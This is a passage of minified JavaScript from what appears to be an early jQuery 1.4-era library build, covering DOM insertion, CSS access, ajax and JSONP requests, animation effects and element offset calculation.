self=jQuery(this);args[0]=value.call(this,i,table?self.html():undefined);self.domManip(args,table,callback)})}if(this[0]){if(args[0]&&args[0].parentNode&&args[0].parentNode.nodeType===11){results={fragment:args[0].parentNode}}else{results=buildFragment(args,this,scripts)}first=results.fragment.firstChild;if(first){table=table&&jQuery.nodeName(first,"tr");for(var i=0,l=this.length;i<l;i++){callback.call(table?root(this[i],first):this[i],results.cacheable||this.length>1||i>0?results.fragment.cloneNode(true):results.fragment)}}if(scripts){jQuery.each(scripts,evalScript)}}return this;function root(elem,cur){return jQuery.nodeName(elem,"table")?(elem.getElementsByTagName("tbody")[0]||elem.appendChild(elem.ownerDocument.createElement("tbody"))):elem}}});function cloneCopyEvent(orig,ret){var i=0;ret.each(function(){if(this.nodeName!==(orig[i]&&orig[i].nodeName)){return}var oldData=jQuery.data(orig[i++]),curData=jQuery.data(this,oldData),events=oldData&&oldData.events;if(events){delete curData.handle;curData.events={};for(var type in events){for(var handler in events[type]){jQuery.event.add(this,type,events[type][handler],events[type][handler].data)}}}})}function buildFragment(args,nodes,scripts){var fragment,cacheable,cacheresults,doc;if(args.length===1&&typeof args[0]==="string"&&args[0].length<512&&args[0].indexOf("<option")<0&&(jQuery.support.checkClone||!rchecked.test(args[0]))){cacheable=true;cacheresults=jQuery.fragments[args[0]];if(cacheresults){if(cacheresults!==1){fragment=cacheresults}}}if(!fragment){doc=(nodes&&nodes[0]?nodes[0].ownerDocument||nodes[0]:document);fragment=doc.createDocumentFragment();jQuery.clean(args,doc,fragment,scripts)}if(cacheable){jQuery.fragments[args[0]]=cacheresults?fragment:1}return{fragment:fragment,cacheable:cacheable}}jQuery.fragments={};jQuery.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(name,original){jQuery.fn[name]=function(selector){var ret=[],insert=jQuery(selector);for(var i=0,l=insert.length;i<l;i++){var elems=(i>0?this.clone(true):this).get();jQuery.fn[original].apply(jQuery(insert[i]),elems);ret=ret.concat(elems)}return this.pushStack(ret,name,insert.selector)}});jQuery.each({remove:function(selector,keepData){if(!selector||jQuery.filter(selector,[this]).length){if(!keepData&&this.nodeType===1){jQuery.cleanData(this.getElementsByTagName("*"));jQuery.cleanData([this])}if(this.parentNode){this.parentNode.removeChild(this)}}},empty:function(){if(this.nodeType===1){jQuery.cleanData(this.getElementsByTagName("*"))}while(this.firstChild){this.removeChild(this.firstChild)}}},function(name,fn){jQuery.fn[name]=function(){return this.each(fn,arguments)}});jQuery.extend({clean:function(elems,context,fragment,scripts){context=context||document;if(typeof context.createElement==="undefined"){context=context.ownerDocument||context[0]&&context[0].ownerDocument||document}var ret=[];jQuery.each(elems,function(i,elem){if(typeof elem==="number"){elem+=""}if(!elem){return}if(typeof elem==="string"&&!rhtml.test(elem)){elem=context.createTextNode(elem)}else if(typeof elem==="string"){elem=elem.replace(rxhtmlTag,fcloseTag);var tag=(rtagName.exec(elem)||["",""])[1].toLowerCase(),wrap=wrapMap[tag]||wrapMap._default,depth=wrap[0],div=context.createElement("div");div.innerHTML=wrap[1]+elem+wrap[2];while(depth--){div=div.lastChild}if(!jQuery.support.tbody){var hasBody=rtbody.test(elem),tbody=tag==="table"&&!hasBody?div.firstChild&&div.firstChild.childNodes:wrap[1]==="<table>"&&!hasBody?div.childNodes:[];for(var j=tbody.length-1;j>=0;--j){if(jQuery.nodeName(tbody[j],"tbody")&&!tbody[j].childNodes.length){tbody[j].parentNode.removeChild(tbody[j])}}}if(!jQuery.support.leadingWhitespace&&rleadingWhitespace.test(elem)){div.insertBefore(context.createTextNode(rleadingWhitespace.exec(elem)[0]),div.firstChild)}elem=jQuery.makeArray(div.childNodes)}if(elem.nodeType){ret.push(elem)}else{ret=jQuery.merge(ret,elem)}});if(fragment){for(var i=0;ret[i];i++){if(scripts&&jQuery.nodeName(ret[i],"script")&&(!ret[i].type||ret[i].type.toLowerCase()==="text/javascript")){scripts.push(ret[i].parentNode?ret[i].parentNode.removeChild(ret[i]):ret[i])}else{if(ret[i].nodeType===1){ret.splice.apply(ret,[i+1,0].concat(jQuery.makeArray(ret[i].getElementsByTagName("script"))))}fragment.appendChild(ret[i])}}}return ret},cleanData:function(elems){for(var i=0,elem,id;(elem=elems[i])!=null;i++){jQuery.event.remove(elem);jQuery.removeData(elem)}}});var rexclude=/z-?index|font-?weight|opacity|zoom|line-?height/i,ralpha=/alpha\([^)]*\)/,ropacity=/opacity=([^)]*)/,rfloat=/float/i,rdashAlpha=/-([a-z])/ig,rupper=/([A-Z])/g,rnumpx=/^-?\d+(?:px)?$/i,rnum=/^-?\d/,cssShow={position:"absolute",visibility:"hidden",display:"block"},cssWidth=["Left","Right"],cssHeight=["Top","Bottom"],getComputedStyle=document.defaultView&&document.defaultView.getComputedStyle,styleFloat=jQuery.support.cssFloat?"cssFloat":"styleFloat",fcamelCase=function(all,letter){return letter.toUpperCase()};jQuery.fn.css=function(name,value){return access(this,name,value,true,function(elem,name,value){if(value===undefined){return jQuery.curCSS(elem,name)}if(typeof value==="number"&&!rexclude.test(name)){value+="px"}jQuery.style(elem,name,value)})};jQuery.extend({style:function(elem,name,value){if(!elem||elem.nodeType===3||elem.nodeType===8){return undefined}if((name==="width"||name==="height")&&parseFloat(value)<0){value=undefined}var style=elem.style||elem,set=value!==undefined;if(!jQuery.support.opacity&&name==="opacity"){if(set){style.zoom=1;var opacity=parseInt(value,10)+""==="NaN"?"":"alpha(opacity="+value*100+")";var filter=style.filter||jQuery.curCSS(elem,"filter")||"";style.filter=ralpha.test(filter)?filter.replace(ralpha,opacity):opacity}return style.filter&&style.filter.indexOf("opacity=")>=0?(parseFloat(ropacity.exec(style.filter)[1])/100)+"":""}if(rfloat.test(name)){name=styleFloat}name=name.replace(rdashAlpha,fcamelCase);if(set){style[name]=value}return style[name]},css:function(elem,name,force,extra){if(name==="width"||name==="height"){var val,props=cssShow,which=name==="width"?cssWidth:cssHeight;function getWH(){val=name==="width"?elem.offsetWidth:elem.offsetHeight;if(extra==="border"){return}jQuery.each(which,function(){if(!extra){val-=parseFloat(jQuery.curCSS(elem,"padding"+this,true))||0}if(extra==="margin"){val+=parseFloat(jQuery.curCSS(elem,"margin"+this,true))||0}else{val-=parseFloat(jQuery.curCSS(elem,"border"+this+"Width",true))||0}})}if(elem.offsetWidth!==0){getWH()}else{jQuery.swap(elem,props,getWH)}return Math.max(0,Math.round(val))}return jQuery.curCSS(elem,name,force)},curCSS:function(elem,name,force){var ret,style=elem.style,filter;if(!jQuery.support.opacity&&name==="opacity"&&elem.currentStyle){ret=ropacity.test(elem.currentStyle.filter||"")?(parseFloat(RegExp.$1)/100)+"":"";return ret===""?"1":ret}if(rfloat.test(name)){name=styleFloat}if(!force&&style&&style[name]){ret=style[name]}else if(getComputedStyle){if(rfloat.test(name)){name="float"}name=name.replace(rupper,"-$1").toLowerCase();var defaultView=elem.ownerDocument.defaultView;if(!defaultView){return null}var computedStyle=defaultView.getComputedStyle(elem,null);if(computedStyle){ret=computedStyle.getPropertyValue(name)}if(name==="opacity"&&ret===""){ret="1"}}else if(elem.currentStyle){var camelCase=name.replace(rdashAlpha,fcamelCase);ret=elem.currentStyle[name]||elem.currentStyle[camelCase];if(!rnumpx.test(ret)&&rnum.test(ret)){var left=style.left,rsLeft=elem.runtimeStyle.left;elem.runtimeStyle.left=elem.currentStyle.left;style.left=camelCase==="fontSize"?"1em":(ret||0);ret=style.pixelLeft+"px";style.left=left;elem.runtimeStyle.left=rsLeft}}return ret},swap:function(elem,options,callback){var old={};for(var name in options){old[name]=elem.style[name];elem.style[name]=options[name]}callback.call(elem);for(var name in options){elem.style[name]=old[name]}}});if(jQuery.expr&&jQuery.expr.filters){jQuery.expr.filters.hidden=function(elem){var width=elem.offsetWidth,height=elem.offsetHeight,skip=elem.nodeName.toLowerCase()==="tr";return width===0&&height===0&&!skip?true:width>0&&height>0&&!skip?false:jQuery.curCSS(elem,"display")==="none"};jQuery.expr.filters.visible=function(elem){return!jQuery.expr.filters.hidden(elem)}}var jsc=now(),rscript=/<script(.|\s)*?\/script>/gi,rselectTextarea=/select|textarea/i,rinput=/color|date|datetime|email|hidden|month|number|password|range|search|tel|text|time|url|week/i,jsre=/=\?(&|$)/,rquery=/\?/,rts=/(\?|&)_=.*?(&|$)/,rurl=/^(\w+:)?\/\/([^\/?#]+)/,r20=/%20/g;jQuery.fn.extend({_load:jQuery.fn.load,load:function(url,params,callback){if(typeof url!=="string"){return this._load(url)}else if(!this.length){return this}var off=url.indexOf(" ");if(off>=0){var selector=url.slice(off,url.length);url=url.slice(0,off)}var type="GET";if(params){if(jQuery.isFunction(params)){callback=params;params=null}else if(typeof params==="object"){params=jQuery.param(params,jQuery.ajaxSettings.traditional);type="POST"}}var self=this;jQuery.ajax({url:url,type:type,dataType:"html",data:params,complete:function(res,status){if(status==="success"||status==="notmodified"){self.html(selector?jQuery("<div />").append(res.responseText.replace(rscript,"")).find(selector):res.responseText)}if(callback){self.each(callback,[res.responseText,status,res])}}});return this},serialize:function(){return jQuery.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?jQuery.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&(this.checked||rselectTextarea.test(this.nodeName)||rinput.test(this.type))}).map(function(i,elem){var val=jQuery(this).val();return val==null?null:jQuery.isArray(val)?jQuery.map(val,function(val,i){return{name:elem.name,value:val}}):{name:elem.name,value:val}}).get()}});jQuery.each("ajaxStart ajaxStop ajaxComplete ajaxError ajaxSuccess ajaxSend".split(" "),function(i,o){jQuery.fn[o]=function(f){return this.bind(o,f)}});jQuery.extend({get:function(url,data,callback,type){if(jQuery.isFunction(data)){type=type||callback;callback=data;data=null}return jQuery.ajax({type:"GET",url:url,data:data,success:callback,dataType:type})},getScript:function(url,callback){return jQuery.get(url,null,callback,"script")},getJSON:function(url,data,callback){return jQuery.get(url,data,callback,"json")},post:function(url,data,callback,type){if(jQuery.isFunction(data)){type=type||callback;callback=data;data={}}return jQuery.ajax({type:"POST",url:url,data:data,success:callback,dataType:type})},ajaxSetup:function(settings){jQuery.extend(jQuery.ajaxSettings,settings)},ajaxSettings:{url:location.href,global:true,type:"GET",contentType:"application/x-www-form-urlencoded",processData:true,async:true,xhr:window.XMLHttpRequest&&(window.location.protocol!=="file:"||!window.ActiveXObject)?function(){return new window.XMLHttpRequest()}:function(){try{return new window.ActiveXObject("Microsoft.XMLHTTP")}catch(e){}},accepts:{xml:"application/xml, text/xml",html:"text/html",script:"text/javascript, application/javascript",json:"application/json, text/javascript",text:"text/plain",_default:"*/*"}},lastModified:{},etag:{},ajax:function(origSettings){var s=jQuery.extend(true,{},jQuery.ajaxSettings,origSettings);var jsonp,status,data,callbackContext=origSettings&&origSettings.context||s,type=s.type.toUpperCase();if(s.data&&s.processData&&typeof s.data!=="string"){s.data=jQuery.param(s.data,s.traditional)}if(s.dataType==="jsonp"){if(type==="GET"){if(!jsre.test(s.url)){s.url+=(rquery.test(s.url)?"&":"?")+(s.jsonp||"callback")+"=?"}}else if(!s.data||!jsre.test(s.data)){s.data=(s.data?s.data+"&":"")+(s.jsonp||"callback")+"=?"}s.dataType="json"}if(s.dataType==="json"&&(s.data&&jsre.test(s.data)||jsre.test(s.url))){jsonp=s.jsonpCallback||("jsonp"+jsc++);if(s.data){s.data=(s.data+"").replace(jsre,"="+jsonp+"$1")}s.url=s.url.replace(jsre,"="+jsonp+"$1");s.dataType="script";window[jsonp]=window[jsonp]||function(tmp){data=tmp;success();complete();window[jsonp]=undefined;try{delete window[jsonp]}catch(e){}if(head){head.removeChild(script)}}}if(s.dataType==="script"&&s.cache===null){s.cache=false}if(s.cache===false&&type==="GET"){var ts=now();var ret=s.url.replace(rts,"$1_="+ts+"$2");s.url=ret+((ret===s.url)?(rquery.test(s.url)?"&":"?")+"_="+ts:"")}if(s.data&&type==="GET"){s.url+=(rquery.test(s.url)?"&":"?")+s.data}if(s.global&&!jQuery.active++){jQuery.event.trigger("ajaxStart")}var parts=rurl.exec(s.url),remote=parts&&(parts[1]&&parts[1]!==location.protocol||parts[2]!==location.host);if(s.dataType==="script"&&type==="GET"&&remote){var head=document.getElementsByTagName("head")[0]||document.documentElement;var script=document.createElement("script");script.src=s.url;if(s.scriptCharset){script.charset=s.scriptCharset}if(!jsonp){var done=false;script.onload=script.onreadystatechange=function(){if(!done&&(!this.readyState||this.readyState==="loaded"||this.readyState==="complete")){done=true;success();complete();script.onload=script.onreadystatechange=null;if(head&&script.parentNode){head.removeChild(script)}}}}head.insertBefore(script,head.firstChild);return undefined}var requestDone=false;var xhr=s.xhr();if(!xhr){return}if(s.username){xhr.open(type,s.url,s.async,s.username,s.password)}else{xhr.open(type,s.url,s.async)}try{if(s.data||origSettings&&origSettings.contentType){xhr.setRequestHeader("Content-Type",s.contentType)}if(s.ifModified){if(jQuery.lastModified[s.url]){xhr.setRequestHeader("If-Modified-Since",jQuery.lastModified[s.url])}if(jQuery.etag[s.url]){xhr.setRequestHeader("If-None-Match",jQuery.etag[s.url])}}if(!remote){xhr.setRequestHeader("X-Requested-With","XMLHttpRequest")}xhr.setRequestHeader("Accept",s.dataType&&s.accepts[s.dataType]?s.accepts[s.dataType]+", */*":s.accepts._default)}catch(e){}if(s.beforeSend&&s.beforeSend.call(callbackContext,xhr,s)===false){if(s.global&&!--jQuery.active){jQuery.event.trigger("ajaxStop")}xhr.abort();return false}if(s.global){trigger("ajaxSend",[xhr,s])}var onreadystatechange=xhr.onreadystatechange=function(isTimeout){if(!xhr||xhr.readyState===0||isTimeout==="abort"){if(!requestDone){complete()}requestDone=true;if(xhr){xhr.onreadystatechange=jQuery.noop}}else if(!requestDone&&xhr&&(xhr.readyState===4||isTimeout==="timeout")){requestDone=true;xhr.onreadystatechange=jQuery.noop;status=isTimeout==="timeout"?"timeout":!jQuery.httpSuccess(xhr)?"error":s.ifModified&&jQuery.httpNotModified(xhr,s.url)?"notmodified":"success";var errMsg;if(status==="success"){try{data=jQuery.httpData(xhr,s.dataType,s)}catch(err){status="parsererror";errMsg=err}}if(status==="success"||status==="notmodified"){if(!jsonp){success()}}else{jQuery.handleError(s,xhr,status,errMsg)}complete();if(isTimeout==="timeout"){xhr.abort()}if(s.async){xhr=null}}};try{var oldAbort=xhr.abort;xhr.abort=function(){if(xhr){oldAbort.call(xhr)}onreadystatechange("abort")}}catch(e){}if(s.async&&s.timeout>0){setTimeout(function(){if(xhr&&!requestDone){onreadystatechange("timeout")}},s.timeout)}try{xhr.send(type==="POST"||type==="PUT"||type==="DELETE"?s.data:null)}catch(e){jQuery.handleError(s,xhr,null,e);complete()}if(!s.async){onreadystatechange()}function success(){if(s.success){s.success.call(callbackContext,data,status,xhr)}if(s.global){trigger("ajaxSuccess",[xhr,s])}}function complete(){if(s.complete){s.complete.call(callbackContext,xhr,status)}if(s.global){trigger("ajaxComplete",[xhr,s])}if(s.global&&!--jQuery.active){jQuery.event.trigger("ajaxStop")}}function trigger(type,args){(s.context?jQuery(s.context):jQuery.event).trigger(type,args)}return xhr},handleError:function(s,xhr,status,e){if(s.error){s.error.call(s.context||s,xhr,status,e)}if(s.global){(s.context?jQuery(s.context):jQuery.event).trigger("ajaxError",[xhr,s,e])}},active:0,httpSuccess:function(xhr){try{return!xhr.status&&location.protocol==="file:"||(xhr.status>=200&&xhr.status<300)||xhr.status===304||xhr.status===1223||xhr.status===0}catch(e){}return false},httpNotModified:function(xhr,url){var lastModified=xhr.getResponseHeader("Last-Modified"),etag=xhr.getResponseHeader("Etag");if(lastModified){jQuery.lastModified[url]=lastModified}if(etag){jQuery.etag[url]=etag}return xhr.status===304||xhr.status===0},httpData:function(xhr,type,s){var ct=xhr.getResponseHeader("content-type")||"",xml=type==="xml"||!type&&ct.indexOf("xml")>=0,data=xml?xhr.responseXML:xhr.responseText;if(xml&&data.documentElement.nodeName==="parsererror"){jQuery.error("parsererror")}if(s&&s.dataFilter){data=s.dataFilter(data,type)}if(typeof data==="string"){if(type==="json"||!type&&ct.indexOf("json")>=0){data=jQuery.parseJSON(data)}else if(type==="script"||!type&&ct.indexOf("javascript")>=0){jQuery.globalEval(data)}}return data},param:function(a,traditional){var s=[];if(traditional===undefined){traditional=jQuery.ajaxSettings.traditional}if(jQuery.isArray(a)||a.jquery){jQuery.each(a,function(){add(this.name,this.value)})}else{for(var prefix in a){buildParams(prefix,a[prefix])}}return s.join("&").replace(r20,"+");function buildParams(prefix,obj){if(jQuery.isArray(obj)){jQuery.each(obj,function(i,v){if(traditional){add(prefix,v)}else{buildParams(prefix+"["+(typeof v==="object"||jQuery.isArray(v)?i:"")+"]",v)}})}else if(!traditional&&obj!=null&&typeof obj==="object"){jQuery.each(obj,function(k,v){buildParams(prefix+"["+k+"]",v)})}else{add(prefix,obj)}}function add(key,value){value=jQuery.isFunction(value)?value():value;s[s.length]=encodeURIComponent(key)+"="+encodeURIComponent(value)}}});var elemdisplay={},rfxtypes=/toggle|show|hide/,rfxnum=/^([+-]=)?([\d+-.]+)(.*)$/,timerId,fxAttrs=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]];jQuery.fn.extend({show:function(speed,callback){if(speed||speed===0){return this.animate(genFx("show",3),speed,callback)}else{for(var i=0,l=this.length;i<l;i++){var old=jQuery.data(this[i],"olddisplay");this[i].style.display=old||"";if(jQuery.css(this[i],"display")==="none"){var nodeName=this[i].nodeName,display;if(elemdisplay[nodeName]){display=elemdisplay[nodeName]}else{var elem=jQuery("<"+nodeName+" />").appendTo("body");display=elem.css("display");if(display==="none"){display="block"}elem.remove();elemdisplay[nodeName]=display}jQuery.data(this[i],"olddisplay",display)}}for(var j=0,k=this.length;j<k;j++){this[j].style.display=jQuery.data(this[j],"olddisplay")||""}return this}},hide:function(speed,callback){if(speed||speed===0){return this.animate(genFx("hide",3),speed,callback)}else{for(var i=0,l=this.length;i<l;i++){var old=jQuery.data(this[i],"olddisplay");if(!old&&old!=="none"){jQuery.data(this[i],"olddisplay",jQuery.css(this[i],"display"))}}for(var j=0,k=this.length;j<k;j++){this[j].style.display="none"}return this}},_toggle:jQuery.fn.toggle,toggle:function(fn,fn2){var bool=typeof fn==="boolean";if(jQuery.isFunction(fn)&&jQuery.isFunction(fn2)){this._toggle.apply(this,arguments)}else if(fn==null||bool){this.each(function(){var state=bool?fn:jQuery(this).is(":hidden");jQuery(this)[state?"show":"hide"]()})}else{this.animate(genFx("toggle",3),fn,fn2)}return this},fadeTo:function(speed,to,callback){return this.filter(":hidden").css("opacity",0).show().end().animate({opacity:to},speed,callback)},animate:function(prop,speed,easing,callback){var optall=jQuery.speed(speed,easing,callback);if(jQuery.isEmptyObject(prop)){return this.each(optall.complete)}return this[optall.queue===false?"each":"queue"](function(){var opt=jQuery.extend({},optall),p,hidden=this.nodeType===1&&jQuery(this).is(":hidden"),self=this;for(p in prop){var name=p.replace(rdashAlpha,fcamelCase);if(p!==name){prop[name]=prop[p];delete prop[p];p=name}if(prop[p]==="hide"&&hidden||prop[p]==="show"&&!hidden){return opt.complete.call(this)}if((p==="height"||p==="width")&&this.style){opt.display=jQuery.css(this,"display");opt.overflow=this.style.overflow}if(jQuery.isArray(prop[p])){(opt.specialEasing=opt.specialEasing||{})[p]=prop[p][1];prop[p]=prop[p][0]}}if(opt.overflow!=null){this.style.overflow="hidden"}opt.curAnim=jQuery.extend({},prop);jQuery.each(prop,function(name,val){var e=new jQuery.fx(self,opt,name);if(rfxtypes.test(val)){e[val==="toggle"?hidden?"show":"hide":val](prop)}else{var parts=rfxnum.exec(val),start=e.cur(true)||0;if(parts){var end=parseFloat(parts[2]),unit=parts[3]||"px";if(unit!=="px"){self.style[name]=(end||1)+unit;start=((end||1)/e.cur(true))*start;self.style[name]=start+unit}if(parts[1]){end=((parts[1]==="-="?-1:1)*end)+start}e.custom(start,end,unit)}else{e.custom(start,val,"")}}});return true})},stop:function(clearQueue,gotoEnd){var timers=jQuery.timers;if(clearQueue){this.queue([])}this.each(function(){for(var i=timers.length-1;i>=0;i--){if(timers[i].elem===this){if(gotoEnd){timers[i](true)}timers.splice(i,1)}}});if(!gotoEnd){this.dequeue()}return this}});jQuery.each({slideDown:genFx("show",1),slideUp:genFx("hide",1),slideToggle:genFx("toggle",1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"}},function(name,props){jQuery.fn[name]=function(speed,callback){return this.animate(props,speed,callback)}});jQuery.extend({speed:function(speed,easing,fn){var opt=speed&&typeof speed==="object"?speed:{complete:fn||!fn&&easing||jQuery.isFunction(speed)&&speed,duration:speed,easing:fn&&easing||easing&&!jQuery.isFunction(easing)&&easing};opt.duration=jQuery.fx.off?0:typeof opt.duration==="number"?opt.duration:jQuery.fx.speeds[opt.duration]||jQuery.fx.speeds._default;opt.old=opt.complete;opt.complete=function(){if(opt.queue!==false){jQuery(this).dequeue()}if(jQuery.isFunction(opt.old)){opt.old.call(this)}};return opt},easing:{linear:function(p,n,firstNum,diff){return firstNum+diff*p},swing:function(p,n,firstNum,diff){return((-Math.cos(p*Math.PI)/2)+0.5)*diff+firstNum}},timers:[],fx:function(elem,options,prop){this.options=options;this.elem=elem;this.prop=prop;if(!options.orig){options.orig={}}}});jQuery.fx.prototype={update:function(){if(this.options.step){this.options.step.call(this.elem,this.now,this)}(jQuery.fx.step[this.prop]||jQuery.fx.step._default)(this);if((this.prop==="height"||this.prop==="width")&&this.elem.style){if(!$(this.elem).is('img')){this.elem.style.display="block"}}},cur:function(force){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==null)){return this.elem[this.prop]}var r=parseFloat(jQuery.css(this.elem,this.prop,force));return r&&r>-10000?r:parseFloat(jQuery.curCSS(this.elem,this.prop))||0},custom:function(from,to,unit){this.startTime=now();this.start=from;this.end=to;this.unit=unit||this.unit||"px";this.now=this.start;this.pos=this.state=0;var self=this;function t(gotoEnd){return self.step(gotoEnd)}t.elem=this.elem;if(t()&&jQuery.timers.push(t)&&!timerId){timerId=setInterval(jQuery.fx.tick,13)}},show:function(){this.options.orig[this.prop]=jQuery.style(this.elem,this.prop);this.options.show=true;this.custom(this.prop==="width"||this.prop==="height"?1:0,this.cur());jQuery(this.elem).show()},hide:function(){this.options.orig[this.prop]=jQuery.style(this.elem,this.prop);this.options.hide=true;this.custom(this.cur(),0)},step:function(gotoEnd){var t=now(),done=true;if(gotoEnd||t>=this.options.duration+this.startTime){this.now=this.end;this.pos=this.state=1;this.update();this.options.curAnim[this.prop]=true;for(var i in this.options.curAnim){if(this.options.curAnim[i]!==true){done=false}}if(done){if(this.options.display!=null){this.elem.style.overflow=this.options.overflow;var old=jQuery.data(this.elem,"olddisplay");this.elem.style.display=old?old:this.options.display;if(jQuery.css(this.elem,"display")==="none"){this.elem.style.display="block"}}if(this.options.hide){jQuery(this.elem).hide()}if(this.options.hide||this.options.show){for(var p in this.options.curAnim){jQuery.style(this.elem,p,this.options.orig[p])}}this.options.complete.call(this.elem)}return false}else{var n=t-this.startTime;this.state=n/this.options.duration;var specialEasing=this.options.specialEasing&&this.options.specialEasing[this.prop];var defaultEasing=this.options.easing||(jQuery.easing.swing?"swing":"linear");this.pos=jQuery.easing[specialEasing||defaultEasing](this.state,n,0,1,this.options.duration);this.now=this.start+((this.end-this.start)*this.pos);this.update()}return true}};jQuery.extend(jQuery.fx,{tick:function(){var timers=jQuery.timers;for(var i=0;i<timers.length;i++){if(!timers[i]()){timers.splice(i--,1)}}if(!timers.length){jQuery.fx.stop()}},stop:function(){clearInterval(timerId);timerId=null},speeds:{slow:600,fast:200,_default:400},step:{opacity:function(fx){jQuery.style(fx.elem,"opacity",fx.now)},_default:function(fx){if(fx.elem.style&&fx.elem.style[fx.prop]!=null){fx.elem.style[fx.prop]=(fx.prop==="width"||fx.prop==="height"?Math.max(0,fx.now):fx.now)+fx.unit}else{fx.elem[fx.prop]=fx.now}}}});if(jQuery.expr&&jQuery.expr.filters){jQuery.expr.filters.animated=function(elem){return jQuery.grep(jQuery.timers,function(fn){return elem===fn.elem}).length}}function genFx(type,num){var obj={};jQuery.each(fxAttrs.concat.apply([],fxAttrs.slice(0,num)),function(){obj[this]=type});return obj}if("getBoundingClientRect"in document.documentElement){jQuery.fn.offset=function(options){var elem=this[0];if(options){return this.each(function(i){jQuery.offset.setOffset(this,options,i)})}if(!elem||!elem.ownerDocument){return null}if(elem===elem.ownerDocument.body){return jQuery.offset.bodyOffset(elem)}var box=elem.getBoundingClientRect(),doc=elem.ownerDocument,body=doc.body,docElem=doc.documentElement,clientTop=docElem.clientTop||body.clientTop||0,clientLeft=docElem.clientLeft||body.clientLeft||0,top=box.top+(self.pageYOffset||jQuery.support.boxModel&&docElem.scrollTop||body.scrollTop)-clientTop,left=box.left+(self.pageXOffset||jQuery.support.boxModel&&docElem.scrollLeft||body.scrollLeft)-clientLeft;return{top:top,left:left}}}else{jQuery.fn.offset=function(options){var elem=this[0];if(options){return this.each(function(i){jQuery.offset.setOffset(this,options,i)})}if(!elem||!elem.ownerDocument){return null}if(elem===elem.ownerDocument.body){return jQuery.offset.bodyOffset(elem)}jQuery.offset.initialize();var offsetParent=elem.offsetParent,prevOffsetParent=elem,doc=elem.ownerDocument,computedStyle,docElem=doc.documentElement,body=doc.body,defaultView=doc.defaultView,prevComputedStyle=defaultView?defaultView.getComputedStyle(elem,null):elem.currentStyle,top=elem.offsetTop,left=elem.offsetLeft;while((elem=elem.parentNode)&&elem!==body&&elem!==docElem){if(jQuery.offset.supportsFixedPosition&&prevComputedStyle.position==="fixed"){break}computedStyle=defaultView?defaultView.getComputedStyle(elem,null):elem.currentStyle;top-=elem.scrollTop;left-=elem.scrollLeft;if(elem===offsetParent){top+=elem.offsetTop;left+=elem.offsetLeft;if(jQuery.offset.doesNotAddBorder&&!(jQuery.offset.doesAddBorderForTableAndCells&&/^t(able|d|h)$/i.test(elem.nodeName))){top+=parseFloat(computedStyle.borderTopWidth)||0;left+=parseFloat(computedStyle.borderLeftWidth)||0}prevOffsetParent=offsetParent,offsetParent=elem.offsetParent}if(jQuery.offset.subtractsBorderForOverflowNotVisible&&computedStyle.overflow!=="visible"){top+=parseFloat(computedStyle.borderTopWidth)||0;left+=parseFloat(computedStyle.borderLeftWidth)||0}prevComputedStyle=computedStyle}if(prevComputedStyle.position==="relative"||prevComputedStyle.position==="static"){top+=body.offsetTop;left+=body.offsetLeft}if(jQuery.offset.supportsFixedPosition&&prevComputedStyle.position==="fixed"){top+=Math.max(docElem.scrollTop,body.scrollTop);left+=Math.max(docElem.scrollLeft,body.scrollLeft)}return{top:top,left:left}}}jQuery.offset={initialize:function(){var body=document.body,container=document.createElement("div"),innerDiv,checkDiv,table,td,bodyMarginTop=parseFloat(jQuery.curCSS(body,"marginTop",true))||0,html="<div style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;'><div></div></div><table style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;' cellpadding='0' cellspacing='0'><tr><td></td></tr></table>";jQuery.extend(container.style,{position:"absolute",top:0,left:0,margin:0,border:0,width:"1px",height:"1px",visibility:"hidden"});container.innerHTML=html;body.insertBefore(container,body.firstChild);innerDiv=container.firstChild;checkDiv=innerDiv.firstChild;td=innerDiv.nextSibling.firstChild.firstChild;this.doesNotAddBorder=(checkDiv.offsetTop!==5);this.doesAddBorderForTableAndCells=(td.offsetTop===5);checkDiv.style.position="fixed",checkDiv.style.top="20px";this.supportsFixedPosition=(checkDiv.offsetTop===20||checkDiv.offsetTop===15);checkDiv.style.position=checkDiv.style.top="";innerDiv.style.overflow="hidden",innerDiv.style.position="relative";this.subtractsBorderForOverflowNotVisible=(checkDiv.offsetTop===-5);this.doesNotIncludeMarginInBodyOffset=(body.offsetTop!==bodyMarginTop);body.removeChild(container);body=container=innerDiv=checkDiv=table=td=null;jQuery.offset.initialize=jQuery.noop},bodyOffset:function(body){var top=body.offsetTop,left=body.offsetLeft;jQuery.offset.initialize();if(jQuery.offset.doesNotIncludeMarginInBodyOffset){top+=parseFloat(jQuery.curCSS(body,"marginTop",true))||0;left+=parseFloat(jQuery.curCSS(body,"marginLeft",true))||0}return{top:top,left:left}},setOffset:function(elem,options,i){if(/static/.test(jQuery.curCSS(elem,"position"))){elem.style.position="relative"}var curElem=jQuery(elem),curOffset=curElem.offset(),curTop=parseInt(jQuery.curCSS(elem,"top",true),10)||0,curLeft=parseInt(jQuery.curCSS(elem,"left",true),10)||0;if(jQuery.isFunction(options)){options=options.call(elem,i,curOffset)}var props={top:(options.top-curOffset.top)+curTop,left:(options.left-curOffset.left)+curLeft};if("using"in options){options.using.call(elem,props)}else{curElem.css(props)}}};jQuery.fn.extend({position:function(){if(!this[0]){return null}var elem=this[0],offsetParent=this.offsetParent(),offset=this.offset(),parentOffset=/^body|html$/i.test(offsetParent[0].nodeName)?{top:0,left:0}:offsetParent.offset();offset.top-=parseFloat(jQuery.curCSS(elem,"marginTop",true))||0;offset.left-=parseFloat(jQuery.curCSS(elem,"marginLeft",true))||0;parentOffset.top+=parseFloat(jQuery.curCSS(offsetParent[0],"borderTopWidth",true))||0;parentOffset.left+=parseFloat(jQuery.curCSS(offsetParent[0],"borderLeftWidth",true))||0;return{top:offset.top-parentOffset.top,left:offset.left-parentOffset.left}},offsetParent:function(){return this.map(function(){var offsetParent=this.offsetParent||document.body;while(offsetParent&&(!/^body|html$/i.test(offsetParent.nodeName)&&jQuery.css(offsetParent,"position")==="static")){offsetParent=offsetParent.offsetParent}return offsetParent})}});jQuery.each(["Left","Top"],function(i,name){var method="scroll"+name;jQuery.fn[method]=function(val){var elem=this[0],win;if(!elem){return 